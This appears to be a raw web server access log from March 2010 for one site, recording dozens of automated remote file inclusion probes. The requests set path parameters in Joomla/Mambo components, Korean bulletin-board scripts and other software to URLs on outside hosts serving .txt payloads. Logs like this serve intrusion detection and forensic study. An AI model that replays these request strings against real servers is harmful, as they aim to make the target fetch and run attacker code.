200.93.147.154 - - [03/Mar/2010:06:16:43 -0800] "GET /logs//////?_SERVER[DOCUMENT_ROOT]=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 200 4951 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:06:16:44 -0800] "GET /logs//////?_SERVER[DOCUMENT_ROOT]=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 200 4951 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:06:16:44 -0800] "GET /logs/access_100208.log//////?_SERVER[DOCUMENT_ROOT]=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:06:16:45 -0800] "GET /////?_SERVER[DOCUMENT_ROOT]=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:06:16:50 -0800] "GET /////?_SERVER[DOCUMENT_ROOT]=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:06:16:51 -0800] "GET /////?_SERVER[DOCUMENT_ROOT]=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:06:16:52 -0800] "GET /logs//////?_SERVER[DOCUMENT_ROOT]=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 200 4951 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:06:16:59 -0800] "GET /logs/access_100208.log%20%20//////?_SERVER[DOCUMENT_ROOT]=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:06:17:01 -0800] "GET /////?_SERVER[DOCUMENT_ROOT]=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:06:17:01 -0800] "GET /logs//////?_SERVER[DOCUMENT_ROOT]=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 200 4951 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:06:17:04 -0800] "GET /////?_SERVER[DOCUMENT_ROOT]=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:06:17:05 -0800] "GET /logs//////?_SERVER[DOCUMENT_ROOT]=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 200 4951 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:06:17:05 -0800] "GET /logs/access_100208.log%20%20//////?_SERVER[DOCUMENT_ROOT]=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:06:17:06 -0800] "GET /logs/access_100208.log//////?_SERVER[DOCUMENT_ROOT]=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:06:18:33 -0800] "GET /logs//////?_SERVER[DOCUMENT_ROOT]=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 200 4951 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:06:18:33 -0800] "GET /logs/access_100208.log//////?_SERVER[DOCUMENT_ROOT]=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:06:18:36 -0800] "GET /////?_SERVER[DOCUMENT_ROOT]=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [03/Mar/2010:06:19:29 -0800] "GET /logs/access_100208.log%20%20//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [03/Mar/2010:06:19:29 -0800] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [03/Mar/2010:06:19:30 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [03/Mar/2010:06:19:43 -0800] "GET /logs/access_100129.log%20%20//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:06:19:45 -0800] "GET /logs/access_100217.log%20%20//ggambo4100_gallery2/setup.php?setup[use_category]=1&dir=http://kucing1.fileave.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:06:19:45 -0800] "GET /logs//ggambo4100_gallery2/setup.php?setup[use_category]=1&dir=http://kucing1.fileave.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:06:19:45 -0800] "GET /ggambo4100_gallery2/setup.php?setup[use_category]=1&dir=http://kucing1.fileave.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:06:19:48 -0800] "GET /ggambo4100_gallery2/setup.php?setup[use_category]=1&dir=http://kucing1.fileave.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:06:19:48 -0800] "GET /logs//ggambo4100_gallery2/setup.php?setup[use_category]=1&dir=http://kucing1.fileave.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:06:19:48 -0800] "GET /logs/access_100217.log%20%20//ggambo4100_gallery2/setup.php?setup[use_category]=1&dir=http://kucing1.fileave.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:06:19:52 -0800] "GET /logs//ggambo4100_gallery2/setup.php?setup[use_category]=1&dir=http://kucing1.fileave.com/id2.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:06:19:52 -0800] "GET /ggambo4100_gallery2/setup.php?setup[use_category]=1&dir=http://kucing1.fileave.com/id2.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:06:19:52 -0800] "GET /logs/access_100217.log%20%20//ggambo4100_gallery2/setup.php?setup[use_category]=1&dir=http://kucing1.fileave.com/id2.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:06:19:53 -0800] "GET /ggambo4100_gallery2/setup.php?setup[use_category]=1&dir=http://kucing1.fileave.com/id2.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:06:19:53 -0800] "GET /logs/access_100217.log%20%20//ggambo4100_gallery2/setup.php?setup[use_category]=1&dir=http://kucing1.fileave.com/id2.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:06:19:53 -0800] "GET /logs//ggambo4100_gallery2/setup.php?setup[use_category]=1&dir=http://kucing1.fileave.com/id2.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:06:19:56 -0800] "GET /ggambo4100_gallery2/setup.php?setup[use_category]=1&dir=http://kucing1.fileave.com/id2.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:06:19:56 -0800] "GET /logs//ggambo4100_gallery2/setup.php?setup[use_category]=1&dir=http://kucing1.fileave.com/id2.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:06:19:56 -0800] "GET /logs/access_100217.log//ggambo4100_gallery2/setup.php?setup[use_category]=1&dir=http://kucing1.fileave.com/id2.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:06:20:01 -0800] "GET /ggambo4100_gallery2/setup.php?setup[use_category]=1&dir=http://kucing1.fileave.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:06:20:01 -0800] "GET /logs//ggambo4100_gallery2/setup.php?setup[use_category]=1&dir=http://kucing1.fileave.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:06:20:01 -0800] "GET /ggambo4100_gallery2/setup.php?setup[use_category]=1&dir=http://kucing1.fileave.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:06:20:01 -0800] "GET /logs/access_100217.log//ggambo4100_gallery2/setup.php?setup[use_category]=1&dir=http://kucing1.fileave.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:06:20:01 -0800] "GET /logs//ggambo4100_gallery2/setup.php?setup[use_category]=1&dir=http://kucing1.fileave.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:06:20:01 -0800] "GET /logs/access_100217.log//ggambo4100_gallery2/setup.php?setup[use_category]=1&dir=http://kucing1.fileave.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:06:20:06 -0800] "GET /ggambo4100_gallery2/setup.php?setup[use_category]=1&dir=http://kucing1.fileave.com/id2.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:06:20:06 -0800] "GET /logs//ggambo4100_gallery2/setup.php?setup[use_category]=1&dir=http://kucing1.fileave.com/id2.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:06:20:07 -0800] "GET /logs/access_100217.log//ggambo4100_gallery2/setup.php?setup[use_category]=1&dir=http://kucing1.fileave.com/id2.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:06:22:24 -0800] "GET /logs/access_100210.log%20%20///bbs//write_update.=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:06:22:24 -0800] "GET /logs/access_100203.log%20%20///bbs//write_update.=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:06:22:24 -0800] "GET /logs///bbs//write_update.=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:06:22:24 -0800] "GET //bbs//write_update.=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:06:22:25 -0800] "GET /logs/access_100203.log%20%20///bbs//write_update.=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:06:22:25 -0800] "GET /logs///bbs//write_update.=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:06:22:25 -0800] "GET /logs/access_100210.log%20%20///bbs//write_update.=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:06:22:25 -0800] "GET //bbs//write_update.=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [03/Mar/2010:06:25:02 -0800] "GET /logs//include/mail.inc.php?skin_board_path=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [03/Mar/2010:06:25:02 -0800] "GET /logs/access_100226.log%20%20//include/mail.inc.php?skin_board_path=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [03/Mar/2010:06:25:02 -0800] "GET /include/mail.inc.php?skin_board_path=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [03/Mar/2010:06:26:04 -0800] "GET /logs/access_100208.log//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [03/Mar/2010:06:26:06 -0800] "GET /logs/access_100202.log//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [03/Mar/2010:06:26:25 -0800] "GET /logs//include/lib.inc.php?site_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [03/Mar/2010:06:26:26 -0800] "GET /logs/access_100226.log//include/lib.inc.php?site_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [03/Mar/2010:06:26:26 -0800] "GET /include/lib.inc.php?site_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [03/Mar/2010:06:26:39 -0800] "GET /logs/access_100129.log//include/lib.inc.php?site_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:06:27:23 -0800] "GET /logs/access_100205.log%20%20//include/write.php?dir=http://kucing1.fileave.com/id2.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:06:27:23 -0800] "GET /include/write.php?dir=http://kucing1.fileave.com/id2.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:06:27:23 -0800] "GET /logs//include/write.php?dir=http://kucing1.fileave.com/id2.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:06:27:30 -0800] "GET /logs/access_100207.log%20%20//include/write.php?dir=http://kucing1.fileave.com/id2.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [03/Mar/2010:06:27:32 -0800] "GET /logs/access_100202.log%20%20//include/mail.inc.php?skin_board_path=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:06:27:50 -0800] "GET /logs/access_090813.log//////?_SERVER[DOCUMENT_ROOT]=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:06:27:50 -0800] "GET /logs//////?_SERVER[DOCUMENT_ROOT]=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 200 4951 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:06:27:50 -0800] "GET /////?_SERVER[DOCUMENT_ROOT]=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [03/Mar/2010:06:27:53 -0800] "GET /logs/access_100209.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [03/Mar/2010:06:27:53 -0800] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [03/Mar/2010:06:27:53 -0800] "GET /index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:06:28:19 -0800] "GET /include/write.php?dir=http://kucing1.fileave.com/id2.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:06:28:19 -0800] "GET /logs//include/write.php?dir=http://kucing1.fileave.com/id2.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:06:28:19 -0800] "GET /logs/access_100205.log%20%20//include/write.php?dir=http://kucing1.fileave.com/id2.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:06:28:21 -0800] "GET /logs/access_100207.log%20%20//include/write.php?dir=http://kucing1.fileave.com/id2.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [03/Mar/2010:06:28:47 -0800] "GET /index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [03/Mar/2010:06:28:55 -0800] "GET /logs/access_100217.log%20%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [03/Mar/2010:06:28:55 -0800] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.122.251.114 - - [03/Mar/2010:06:29:07 -0800] "GET /logs/access_100204.log//modules/xfsection/modify.php?dir_module=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.108.64.216 - - [03/Mar/2010:06:30:32 -0800] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.leaderpmc.com/banner/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
89.108.64.216 - - [03/Mar/2010:06:31:16 -0800] "GET /logs/access_100206.log//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.leaderpmc.com/banner/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:06:33:12 -0800] "GET /logs/access_100204.log%20%20//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:06:33:12 -0800] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:06:33:13 -0800] "GET /index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:06:33:17 -0800] "GET /logs/access_100204.log%20%20//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:06:33:17 -0800] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:06:33:17 -0800] "GET /index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
87.250.255.242 - - [03/Mar/2010:06:33:36 -0800] "GET /logs/access_091220.log HTTP/1.1" 404 5258 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.puaga.com"
78.46.87.243 - - [03/Mar/2010:06:34:54 -0800] "GET /component/option,com_frontpage/%20%E2%80%A6//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://ticcamp.co.kr/hex/idlab1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [03/Mar/2010:06:34:54 -0800] "GET /logs//component/option,com_frontpage/%20%E2%80%A6//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://ticcamp.co.kr/hex/idlab1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [03/Mar/2010:06:34:54 -0800] "GET /logs/access_100208.log//component/option,com_frontpage/%20%E2%80%A6//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://ticcamp.co.kr/hex/idlab1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:06:36:38 -0800] "GET /logs/access_100207.log//include/write.php?dir=http://kucing1.fileave.com/id2.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:06:36:38 -0800] "GET /logs/access_100205.log//include/write.php?dir=http://kucing1.fileave.com/id2.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:06:37:16 -0800] "GET /logs/access_100207.log//include/write.php?dir=http://kucing1.fileave.com/id2.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:06:37:16 -0800] "GET /logs/access_100205.log//include/write.php?dir=http://kucing1.fileave.com/id2.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [03/Mar/2010:06:37:43 -0800] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [03/Mar/2010:06:37:44 -0800] "GET /logs/access_100204.log%20%20//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [03/Mar/2010:06:37:44 -0800] "GET /index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
216.122.251.114 - - [03/Mar/2010:06:38:45 -0800] "GET /logs/access_100204.log//modules/xfsection/modify.php?dir_module=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [03/Mar/2010:06:38:52 -0800] "GET /logs/access_100214.log//bbs//download.php?board_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [03/Mar/2010:06:38:52 -0800] "GET /bbs//download.php?board_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [03/Mar/2010:06:38:52 -0800] "GET /logs//bbs//download.php?board_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [03/Mar/2010:06:38:57 -0800] "GET /logs/access_100224.log//bbs//download.php?board_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [03/Mar/2010:06:39:27 -0800] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [03/Mar/2010:06:39:27 -0800] "GET /index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [03/Mar/2010:06:39:27 -0800] "GET /logs/access_100204.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.150.205.155 - - [03/Mar/2010:06:41:08 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.puaga.com"
211.239.124.204 - - [03/Mar/2010:06:41:37 -0800] "GET /logs//?_zb_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [03/Mar/2010:06:41:37 -0800] "GET /?_zb_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [03/Mar/2010:06:42:06 -0800] "GET /logs/access_100213.log//?_zb_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [03/Mar/2010:06:42:18 -0800] "GET /logs//kboard.php?board=free&act=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [03/Mar/2010:06:42:18 -0800] "GET /kboard.php?board=free&act=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [03/Mar/2010:06:42:19 -0800] "GET /logs/access_100214.log//kboard.php?board=free&act=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [03/Mar/2010:06:42:24 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:06:43:24 -0800] "GET //bbs//com.br/images/img.=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
